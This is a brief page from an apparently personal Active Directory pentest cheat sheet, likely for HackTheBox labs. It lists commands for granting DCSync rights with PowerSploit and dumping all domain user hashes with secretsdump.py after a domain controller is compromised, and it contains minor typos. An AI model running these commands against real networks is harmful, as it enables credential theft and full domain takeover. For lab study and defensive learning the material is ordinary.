After Getting D.C.

If you are a Domain Controller then you can dump all user hashes means proof that whole domain is mine.

  windows: Import-Module .\PowerSploit.ps1

  windows: AddDomainObjectAcl -PrincipalIdentity DC_username -TargetIdentity “DC=htb,DC=local” -Rights DCSsync

  linux: secretsdump.py ‘ht.local/DC_username:password@$IP’

Previousmy A.D. Cheat-Sheet NextPriv-Esc

Last updated 3 years ago